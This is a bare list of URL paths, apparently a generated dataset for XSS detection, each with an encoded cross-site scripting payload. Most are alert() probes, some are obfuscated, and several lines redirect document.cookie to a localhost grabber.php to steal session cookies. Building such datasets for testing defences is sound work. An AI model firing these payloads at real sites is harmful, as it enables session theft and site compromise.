/search?banana=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/products?laptop=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/order?search_term=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/products?laptop=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?password123=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/order?book=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/search?action1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/login?username1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/search?book=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/order?action1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/checkout?query=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?book=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/order?value1=%3Csvg%20onload%3Dalert%281%29%3E
/order?book=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/api?phone=%3Csvg%20onload%3Dalert%281%29%3E
/order?laptop=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/order?laptop=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?banana=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/checkout?apple=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/login?username1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/cart?phone=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?search_term=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?electronics=%3Csvg%20onload%3Dalert%281%29%3E
/cart?apple=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?action1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/search?book=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/products?query=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/login?username1=%3Csvg%20onload%3Dalert%281%29%3E
/login?username1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/products?apple=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/search?action1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/order?username1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?banana=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?apple=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/order?electronics=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/checkout?action1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/products?password123=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/checkout?electronics=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/checkout?electronics=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/products?apple=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/api?value1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/wishlist?shoes=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/cart?laptop=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/cart?category1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/search?query=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/login?phone=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/wishlist?phone=%3Csvg%20onload%3Dalert%281%29%3E
/login?username1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/login?category1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/order?electronics=%3Csvg%20onload%3Dalert%281%29%3E
/login?apple=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/checkout?search_term=%3Csvg%20onload%3Dalert%281%29%3E
/cart?shoes=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/cart?book=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/cart?action1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/cart?action1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/checkout?value1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/wishlist?username1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/search?search_term=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?apple=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?username1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/login?electronics=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/wishlist?action1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?category1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/order?banana=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?category1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/wishlist?laptop=%3Csvg%20onload%3Dalert%281%29%3E
/search?book=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/cart?action1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/api?book=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/checkout?action1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?username1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/checkout?value1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?password123=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/wishlist?password123=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/api?laptop=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?password123=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/cart?shoes=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/products?apple=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/checkout?book=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/login?value1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/cart?category1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/api?apple=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/api?value1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?search_term=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/checkout?search_term=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/api?search_term=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/wishlist?laptop=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/products?category1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/login?category1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/cart?query=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/login?action1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?action1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?shoes=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/api?query=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/order?query=%3Csvg%20onload%3Dalert%281%29%3E
/products?apple=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/wishlist?category1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/order?password123=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/api?action1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/login?laptop=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/wishlist?username1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/checkout?laptop=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/order?banana=%3Csvg%20onload%3Dalert%281%29%3E
/order?category1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/wishlist?password123=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/cart?category1=%3Csvg%20onload%3Dalert%281%29%3E
/api?query=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?action1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/cart?banana=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/api?password123=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?query=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/wishlist?query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?value1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/api?category1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/checkout?electronics=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/checkout?electronics=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/cart?shoes=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/order?username1=%3Csvg%20onload%3Dalert%281%29%3E
/order?action1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/cart?banana=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/products?action1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?username1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/order?apple=%3Csvg%20onload%3Dalert%281%29%3E
/search?phone=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/checkout?apple=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/cart?username1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/cart?value1=%3Csvg%20onload%3Dalert%281%29%3E
/checkout?action1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/wishlist?shoes=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/checkout?banana=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?category1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?apple=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/login?action1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?category1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/login?category1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/products?book=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/checkout?laptop=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/products?action1=%3Csvg%20onload%3Dalert%281%29%3E
/checkout?username1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/api?password123=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/wishlist?banana=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/api?value1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/login?phone=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/cart?search_term=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/order?query=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/cart?value1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/checkout?category1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/checkout?username1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?category1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/wishlist?laptop=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/cart?banana=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/order?search_term=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/products?action1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?shoes=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?laptop=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/wishlist?username1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/wishlist?username1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/wishlist?query=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/api?category1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?action1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/order?search_term=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/order?search_term=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/wishlist?password123=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/login?electronics=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/search?banana=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/order?search_term=%3Csvg%20onload%3Dalert%281%29%3E
/order?book=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?shoes=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/checkout?username1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/wishlist?action1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/wishlist?apple=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/order?username1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/wishlist?password123=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?query=%3Csvg%20onload%3Dalert%281%29%3E
/api?phone=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/products?category1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/wishlist?category1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/checkout?value1=%3Csvg%20onload%3Dalert%281%29%3E
/search?book=%3Csvg%20onload%3Dalert%281%29%3E
/cart?laptop=%3Csvg%20onload%3Dalert%281%29%3E
/cart?action1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/products?category1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/products?query=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/cart?shoes=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/cart?query=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/checkout?book=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/products?phone=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/order?value1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/checkout?banana=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?password123=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/api?phone=%3Csvg%20onload%3Dalert%281%29%3E
/cart?value1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/api?password123=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/api?value1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/checkout?category1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?phone=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/search?category1=%3Csvg%20onload%3Dalert%281%29%3E
/products?category1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?shoes=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/cart?password123=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/api?username1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?apple=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/order?banana=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/order?password123=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/cart?laptop=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/api?banana=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?laptop=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?category1=%3Csvg%20onload%3Dalert%281%29%3E
/products?electronics=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/login?book=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?electronics=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/api?password123=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/login?book=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/order?action1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/order?password123=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?shoes=%3Csvg%20onload%3Dalert%281%29%3E
/wishlist?username1=%3Csvg%20onload%3Dalert%281%29%3E
/search?value1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?electronics=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/api?category1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/api?electronics=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?password123=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/checkout?shoes=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?electronics=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/order?shoes=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/checkout?action1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/cart?shoes=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/checkout?apple=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?electronics=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/products?shoes=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/wishlist?electronics=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/order?username1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/cart?electronics=%3Csvg%20onload%3Dalert%281%29%3E
/api?action1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/checkout?phone=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/login?password123=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/search?password123=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/cart?value1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/wishlist?electronics=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?username1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?laptop=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/wishlist?electronics=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?shoes=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/api?category1=%3Csvg%20onload%3Dalert%281%29%3E
/api?password123=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/cart?electronics=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/search?category1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/login?action1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/products?action1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/products?phone=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/api?query=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/wishlist?laptop=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/cart?password123=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/api?phone=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/search?value1=%3Csvg%20onload%3Dalert%281%29%3E
/search?username1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/cart?value1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/login?value1=%3Csvg%20onload%3Dalert%281%29%3E
/api?password123=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/login?search_term=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/products?password123=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?password123=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/api?banana=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?book=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?value1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/api?password123=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/api?shoes=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/wishlist?action1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/products?electronics=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?action1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/search?value1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/search?phone=%3Csvg%20onload%3Dalert%281%29%3E
/search?value1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/wishlist?electronics=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?category1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/search?banana=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/login?banana=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/cart?query=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/search?apple=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/checkout?book=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/search?category1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/api?shoes=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/wishlist?phone=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/products?category1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/login?category1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/login?category1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/search?laptop=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/api?action1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/checkout?book=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/checkout?electronics=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/products?laptop=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/cart?query=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/products?password123=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?electronics=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/login?action1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?search_term=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/login?action1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?laptop=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/order?query=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/api?username1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/search?shoes=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?apple=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?shoes=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/checkout?laptop=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/cart?banana=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/products?book=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?category1=%3Csvg%20onload%3Dalert%281%29%3E
/cart?book=%3Csvg%20onload%3Dalert%281%29%3E
/products?value1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/checkout?category1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/api?banana=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/cart?laptop=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/api?laptop=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/products?username1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?shoes=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/cart?banana=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/wishlist?action1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?action1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?shoes=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?electronics=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?banana=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/search?value1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/order?action1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?password123=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/api?phone=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/search?book=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/search?book=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
